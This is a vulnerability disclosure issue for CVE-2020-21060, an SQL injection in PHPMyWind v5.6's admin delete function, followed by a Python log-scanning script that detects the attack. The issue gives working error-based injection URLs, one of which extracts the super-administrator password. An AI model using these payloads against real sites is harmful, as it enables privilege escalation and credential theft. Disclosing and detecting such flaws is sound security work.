CVE-2020-21060: sql injection exists many places in PHPMyWind v5.6 · Issue #10 · gaozhifeng/PHPMyWind
SQL injection vulnerability found in PHPMyWind v.5.6 allows a remote attacker to gain privileges via the delete function of the administrator management page.
Product Homepage: http://phpmywind.com/
Hello!
I found a serious SQL injection vulnerability in the backend management system (/admin/admin_save.php) of PHPMyWind v5.6.
This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords.
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers.
Now log in to the background management system as the site administrator and click administrator management; the “delete function” is the location of the vulnerability.
Its URL is http://127.0.0.1/admin/admin_save.php?action=del&id=4
POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27
(2) Show the current database
http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))
(3) Query out the super administrator password
http://127.0.0.1/admin/admin_save.php?action=del&id=4 and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))
This vulnerability allows you to query the database for any data you want
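
A detection sketch for the request pattern reported above, added here as an example and not part of the original issue or of the PHPMyWind code base: it flags `action=del` requests to `admin_save.php` whose `id` value is not a plain integer. The access-log format, the sample lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /admin/admin_save.php?action=del&id=4 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2020:10:01:00 +0000] "GET /admin/admin_save.php?action=del&id=4%27 HTTP/1.1" 200 830',
    # Raw, unencoded spaces in the request target, as in PoC (3) of the report.
    '10.0.0.8 - - [01/Jan/2020:10:02:00 +0000] "GET /admin/admin_save.php?action=del&id=4 and 1=1 HTTP/1.1" 200 830',
    # Different script: out of scope for this particular check.
    '10.0.0.9 - - [01/Jan/2020:10:03:00 +0000] "GET /admin/other.php?action=del&id=4%27 HTTP/1.1" 200 100',
]

# [^"]+ is greedy, so a target containing spaces is still captured whole.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^"]+) HTTP/[\d.]+"')
SCRIPT = "/admin_save.php"  # script name from the report; the admin directory may be renamed


def suspicious_delete_requests(lines):
    """Return (client_ip, decoded_id) for del requests whose id is not a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.lower().endswith(SCRIPT):
            continue
        # parse_qs URL-decodes values, so %27 and %20 are compared in decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        if "del" not in params.get("action", []):
            continue
        for value in params.get("id", []):
            # isdigit() alone accepts non-ASCII digits such as "²", hence isascii().
            if not (value.isascii() and value.isdigit()):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_delete_requests(SAMPLE_LOG):
        print(f"{client}: non-numeric id in delete request: {value!r}")
```

Only query-string parameters are inspected, so requests that carry `id` in a POST body need the same check applied wherever request bodies are logged.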